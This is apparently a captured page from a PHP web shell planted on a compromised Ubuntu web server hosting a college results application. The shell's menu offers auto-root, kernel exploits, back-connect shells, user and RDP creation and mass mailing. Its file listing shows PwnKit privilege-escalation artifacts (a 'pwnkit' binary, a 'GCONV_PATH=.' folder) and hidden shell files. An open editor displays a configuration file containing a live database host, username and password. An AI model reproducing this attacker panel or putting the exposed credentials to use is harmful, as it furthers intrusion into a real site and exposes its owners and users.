Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.217.104.36
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ssa /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxrwxrwx
Excel_reader
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxrwxrwx
Report_details
[ DIR ]
drwxrwxrwx
Report_details_16042016
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
custom_js
[ DIR ]
drwxrwxrwx
custom_src
[ DIR ]
drwxrwxrwx
grid_display_files
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxrwxrwx
html_modules_16042016
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
js_16042016
[ DIR ]
drwxrwxrwx
libs
[ DIR ]
drwxrwxrwx
links
[ DIR ]
drwxrwxrwx
maya-pdf
[ DIR ]
drwxrwxrwx
schema
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
src_16042016
[ DIR ]
drwxrwxrwx
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxrwxrwx
tarka_pdf_latest
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
.ssa.php
3.61
KB
-rw-r--r--
MainPage.html
12.3
KB
-rwxrwxrwx
MainPagepopup.html
7.05
KB
-rwxrwxrwx
app.php
416
B
-rwxrwxrwx
cconfig_old.php
1.13
KB
-rwxrwxrwx
collegeInfoPopup.html
3.79
KB
-rwxrwxrwx
homepage.html
3.35
KB
-rwxrwxrwx
index.php
80
B
-rwxrwxrwx
index_stop.html
5.83
KB
-rwxrwxrwx
indexlogin.html
5.81
KB
-rwxrwxrwx
paytm_res.php
4.17
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
resetPasswordOTP.html
2.03
KB
-rwxrwxrwx
resetPasswordPopup.html
1.79
KB
-rwxrwxrwx
spinner_bar.gif
1.81
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig_old.php
<?php define("APP_NAME_G","development"); define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); define("INR_NAME_PICFORMAT", "xx,xx,xx,xxx.xx"); //define("APP_HOST", "http://10.10.200.172/activity/"); //define("APP_HOST", "http://localhost/activity/"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "72.167.46.92"; #hostname can include port as well $this->mstr_user = "ssauser"; $this->mstr_password = "ssaass"; $this->mstr_db = "resultsg_ssa"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); /* $this->mstr_host = "localhost"; #hostname can include port as well $this->mstr_user = "resultsg_tarka"; $this->mstr_password = "tarka123"; $this->mstr_db = "resultsg_rcu"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); */ } } ?>
Close